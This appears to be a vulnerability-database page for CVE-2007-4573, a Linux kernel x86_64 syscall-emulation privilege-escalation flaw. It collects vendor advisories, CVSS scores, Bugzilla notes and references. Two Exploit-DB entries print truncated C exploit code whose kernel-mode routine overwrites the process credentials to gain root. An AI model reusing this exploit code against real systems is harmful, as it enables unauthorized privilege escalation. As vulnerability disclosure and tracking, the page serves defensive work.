CVE-2007-4573
published 2007-09-24CVE-2007-4573: The IA32 system call emulation functionality in Linux kernel 2.4.x and 2.6.x before 2.6.22.7, when running on the x86_64 architecture, does not zero extend the…
PriorityP432high7.2CVSS 2.0
AVLACLAuNCCICAC
EXPLOIT
EPSS
0.82%
52.6th percentile
The IA32 system call emulation functionality in Linux kernel 2.4.x and 2.6.x before 2.6.22.7, when running on the x86_64 architecture, does not zero extend the eax register after the 32bit entry path to ptrace is used, which might allow local users to gain privileges by triggering an out-of-bounds access to the system call table using the %RAX register.
Affected
8 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| linux | linux_kernel | < 2.6.36 | 2.6.36 |
| linux | linux_kernel | <= 2.4.35 | — |
| linux | linux_kernel | <= 2.6.22.6 | — |
| linux | linux_kernel | — | — |
| suse | linux_enterprise_real_time_extension | — | — |
CVSS provenance
nvdv2.07.2HIGHAV:L/AC:L/Au:N/C:C/I:C/A:C
vendor_redhat7.2HIGH
vendor_ubuntu4.9MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Red Hat
kernel: IA32 System Call Entry Point Vulnerability
vendor_redhat·2010-09-15·CVSS 7.2
CVE-2010-3301 [HIGH] CWE-681 kernel: IA32 System Call Entry Point Vulnerability
kernel: IA32 System Call Entry Point Vulnerability
The IA32 system call emulation functionality in arch/x86/ia32/ia32entry.S in the Linux kernel before 2.6.36-rc4-git2 on the x86_64 platform does not zero extend the %eax register after the 32-bit entry path to ptrace is used, which allows local users to gain privileges by triggering an out-of-bounds access to the system call table using the %rax register. NOTE: this vulnerability exists because of a CVE-2007-4573 regression.
Statement: This issue did not affect the versions of Linux kernel as shipped with Red Hat Enterprise Linux 3, 4, 5, and Red Hat Enterprise MRG, as they do not contain the upstream commit d4d67150 that introduced this flaw.
More information can be found in this kbase: https://access.redhat.com/kb/docs/DOC-40330
Ubuntu
linux-source-2.6.15, linux-source-2.6.17, linux-source-2.6.20 vulnerabilities
vendor_ubuntu·2007-09-25·CVSS 4.9
CVE-2007-3731 [MEDIUM] linux-source-2.6.15, linux-source-2.6.17, linux-source-2.6.20 vulnerabilities
Title: linux-source-2.6.15, linux-source-2.6.17, linux-source-2.6.20 vulnerabilities
Summary: linux-source-2.6.15, linux-source-2.6.17, linux-source-2.6.20 vulnerabilities
Evan Teran discovered that the Linux kernel ptrace routines did not
correctly handle certain requests robustly. Local attackers could exploit
this to crash the system, causing a denial of service. (CVE-2007-3731)
It was discovered that hugetlb kernels on PowerPC systems did not prevent
the stack from colliding with reserved kernel memory. Local attackers
could exploit this and crash the system, causing a denial of service.
(CVE-2007-3739)
It was discovered that certain CIFS filesystem actions did not honor
the umask of a process. Local attackers could exploit this to gain
additional privileges. (CVE-2007-3740)
Wojci
Red Hat
x86_64 syscall vulnerability
vendor_redhat·2007-09-21·CVSS 7.2
CVE-2007-4573 [HIGH] x86_64 syscall vulnerability
x86_64 syscall vulnerability
The IA32 system call emulation functionality in Linux kernel 2.4.x and 2.6.x before 2.6.22.7, when running on the x86_64 architecture, does not zero extend the eax register after the 32bit entry path to ptrace is used, which might allow local users to gain privileges by triggering an out-of-bounds access to the system call table using the %RAX register.
Statement: This issue affected users who were running 64-bit versions of Red Hat Enterprise Linux 3, 4, or 5 on x86_64 architecture. It did not affect users of Red Hat Enterprise Linux 2.1.
GHSA
GHSA-79mw-6jhw-7997: The IA32 system call emulation functionality in arch/x86/ia32/ia32entry
ghsa_unreviewed·2022-05-13·CVSS 7.2
CVE-2010-3301 [HIGH] CWE-269 GHSA-79mw-6jhw-7997: The IA32 system call emulation functionality in arch/x86/ia32/ia32entry
The IA32 system call emulation functionality in arch/x86/ia32/ia32entry.S in the Linux kernel before 2.6.36-rc4-git2 on the x86_64 platform does not zero extend the %eax register after the 32-bit entry path to ptrace is used, which allows local users to gain privileges by triggering an out-of-bounds access to the system call table using the %rax register. NOTE: this vulnerability exists because of a CVE-2007-4573 regression.
GHSA
GHSA-jqfp-qwq6-6w3h: The IA32 system call emulation functionality in Linux kernel 2
ghsa_unreviewed·2022-05-01
CVE-2007-4573 [HIGH] GHSA-jqfp-qwq6-6w3h: The IA32 system call emulation functionality in Linux kernel 2
The IA32 system call emulation functionality in Linux kernel 2.4.x and 2.6.x before 2.6.22.7, when running on the x86_64 architecture, does not zero extend the eax register after the 32bit entry path to ptrace is used, which might allow local users to gain privileges by triggering an out-of-bounds access to the system call table using the %RAX register.
No detection rules found.
Exploit-DB
Linux Kernel 2.4/2.6 (x86-64) - System Call Emulation Privilege Escalation
exploitdb·2007-09-27
CVE-2007-4573 Linux Kernel 2.4/2.6 (x86-64) - System Call Emulation Privilege Escalation
Linux Kernel 2.4/2.6 (x86-64) - System Call Emulation Privilege Escalation
---
/*
* exploit for x86_64 linux kernel ia32syscall emulation
* bug, discovered by Wojciech Purczynski
*
* by
* Robert Swiecki
* Przemyslaw Frasunek
* Pawel Pisarczyk
* of ATM-Lab http://www.atm-lab.pl
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
uint32_t uid, euid, suid;
static void kernelmodecode(void)
{
int i;
uint8_t *gs;
uint32_t *ptr;
asm volatile ("movq %%gs:(0x0), %0" : "=r"(gs));
for (i = 200; i < 1000; i+=1) {
ptr = (uint32_t*) (gs + i);
if ((ptr[0] == uid) && (ptr[1] == euid)
&& (ptr[2] == suid) && (ptr[3] == uid)) {
ptr[0] = 0; //UID
ptr[1] = 0; //EUID
ptr[2] = 0; //SUID
break;
}
}
}
static void docall(uint64_t *ptr, uint64_t size)
{
getresuid(&uid, &eu
Exploit-DB
Linux Kernel 2.6.x - Ptrace Privilege Escalation
exploitdb·2007-09-21
CVE-2007-4573 Linux Kernel 2.6.x - Ptrace Privilege Escalation
Linux Kernel 2.6.x - Ptrace Privilege Escalation
---
/*
source: https://www.securityfocus.com/bid/25774/info
The Linux kernel is prone to a local privilege-escalation vulnerability.
Exploiting this issue may allow local attackers to gain elevated privileges, facilitating the complete compromise of affected computers.
Versions of Linux kernel prior to 2.4.35.3 and 2.6.22.7 are vulnerable to this issue.
*/
/*
* exploit for x86_64 linux kernel ia32syscall emulation
* bug, discovered by Wojciech Purczynski
*
* by
* Robert Swiecki
* Przemyslaw Frasunek
* Pawel Pisarczyk
* of ATM-Lab http://www.atm-lab.pl
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
uint32_t uid, euid, suid;
static void kernelmodecode(void)
{
int i;
uint8_t *gs;
uint32_t *ptr;
as
Bugzilla
CVE-2010-3301 kernel: IA32 System Call Entry Point Vulnerability
bugzilla·2010-09-16·CVSS 7.2
CVE-2010-3301 [HIGH] CVE-2010-3301 kernel: IA32 System Call Entry Point Vulnerability
CVE-2010-3301 kernel: IA32 System Call Entry Point Vulnerability
Description of problem:
CVE-2007-4573 regression
Reintroduced in v2.6.27-rc1 via commit d4d67150.
Upstream commits:
http://git.kernel.org/linus/36d001c70d8a0144ac1d038f6876c484849a74de
http://git.kernel.org/linus/eefdca043e8391dcd719711716492063030b55ac
References:
http://sota.gen.nz/compat2/
Acknowledgements:
Red Hat would like to thank Ben Hawkes for reporting this issue.
Discussion:
Statement:
This issue did not affect the versions of Linux kernel as shipped with Red Hat Enterprise Linux 3, 4, 5, and Red Hat Enterprise MRG, as they do not contain the upstream commit d4d67150 that introduced this flaw.
More information can be found in this kbase: https://access.redhat.com/kb/docs/DOC-40330
---
Public exploit: ht
Bugzilla
CVE-2007-4573 x86_64 syscall vulnerability
bugzilla·2007-09-18·CVSS 7.2
CVE-2007-4573 [HIGH] CVE-2007-4573 x86_64 syscall vulnerability
CVE-2007-4573 x86_64 syscall vulnerability
Wojciech Purczynski of COSEINC notified us of a kernel security issue that could
lead to local privilege escalation on x86_64 platforms.
draft advisory to follow.
Acknowledgements:
Red Hat would like to thank Wojciech Purczynski for reporting this issue.
Discussion:
Note that for RHEL5 this fix probably also need to be applied to ia32entry-xen.S
created by linux-2.6-xen.patch
---
Fix has been committed upstream (public)
---
URL of the fix:
http://git.kernel.org/gitweb.cgi?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=176df2457ef6207156ca1a40991c54ca01fef567
---
public, removing embargo
---
Details of privilege escalation consequence now public via advisory:
http://marc.info/?l=full-disclosure&m=119062587407908&w=2
(opening up
http://fedoranews.org/updates/FEDORA-2007-229.shtmlhttp://kernel.org/pub/linux/kernel/v2.4/ChangeLog-2.4.35.3http://lists.opensuse.org/opensuse-security-announce/2007-12/msg00001.htmlhttp://lkml.org/lkml/2007/9/21/512http://lkml.org/lkml/2007/9/21/513http://marc.info/?l=full-disclosure&m=119062587407908&w=2http://secunia.com/advisories/26917http://secunia.com/advisories/26919http://secunia.com/advisories/26934http://secunia.com/advisories/26953http://secunia.com/advisories/26955http://secunia.com/advisories/26978http://secunia.com/advisories/26994http://secunia.com/advisories/26995http://secunia.com/advisories/27212http://secunia.com/advisories/27227http://secunia.com/advisories/27912http://secunia.com/advisories/29058http://securitytracker.com/id?1018748http://www.debian.org/security/2007/dsa-1378http://www.debian.org/security/2007/dsa-1381http://www.debian.org/security/2008/dsa-1504http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.22.7http://www.mandriva.com/security/advisories?name=MDKSA-2007:195http://www.mandriva.com/security/advisories?name=MDKSA-2007:196http://www.mandriva.com/security/advisories?name=MDVSA-2008:008http://www.mandriva.com/security/advisories?name=MDVSA-2008:105http://www.novell.com/linux/security/advisories/2007_53_kernel.htmlhttp://www.redhat.com/support/errata/RHSA-2007-0936.htmlhttp://www.redhat.com/support/errata/RHSA-2007-0937.htmlhttp://www.redhat.com/support/errata/RHSA-2007-0938.htmlhttp://www.securityfocus.com/archive/1/480451/100/0/threadedhttp://www.securityfocus.com/archive/1/480705/100/0/threadedhttp://www.securityfocus.com/bid/25774http://www.ubuntu.com/usn/usn-518-1http://www.vupen.com/english/advisories/2007/3246https://issues.rpath.com/browse/RPL-1754https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A9735https://www.redhat.com/archives/fedora-package-announce/2007-September/msg00355.htmlhttp://fedoranews.org/updates/FEDORA-2007-229.shtmlhttp://kernel.org/pub/linux/kernel/v2.4/ChangeLog-2.4.35.3http://lists.opensuse.org/opensuse-security-announce/2007-12/msg00001.htmlhttp://lkml.org/lkml/2007/9/21/512http://lkml.org/lkml/2007/9/21/513http://marc.info/?l=full-disclosure&m=119062587407908&w=2http://secunia.com/advisories/26917http://secunia.com/advisories/26919http://secunia.com/advisories/26934http://secunia.com/advisories/26953http://secunia.com/advisories/26955http://secunia.com/advisories/26978http://secunia.com/advisories/26994http://secunia.com/advisories/26995http://secunia.com/advisories/27212http://secunia.com/advisories/27227http://secunia.com/advisories/27912http://secunia.com/advisories/29058http://securitytracker.com/id?1018748http://www.debian.org/security/2007/dsa-1378http://www.debian.org/security/2007/dsa-1381http://www.debian.org/security/2008/dsa-1504http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.22.7http://www.mandriva.com/security/advisories?name=MDKSA-2007:195http://www.mandriva.com/security/advisories?name=MDKSA-2007:196http://www.mandriva.com/security/advisories?name=MDVSA-2008:008http://www.mandriva.com/security/advisories?name=MDVSA-2008:105http://www.novell.com/linux/security/advisories/2007_53_kernel.htmlhttp://www.redhat.com/support/errata/RHSA-2007-0936.htmlhttp://www.redhat.com/support/errata/RHSA-2007-0937.htmlhttp://www.redhat.com/support/errata/RHSA-2007-0938.htmlhttp://www.securityfocus.com/archive/1/480451/100/0/threadedhttp://www.securityfocus.com/archive/1/480705/100/0/threadedhttp://www.securityfocus.com/bid/25774http://www.ubuntu.com/usn/usn-518-1http://www.vupen.com/english/advisories/2007/3246https://issues.rpath.com/browse/RPL-1754https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A9735https://www.redhat.com/archives/fedora-package-announce/2007-September/msg00355.html
2007-09-24
Published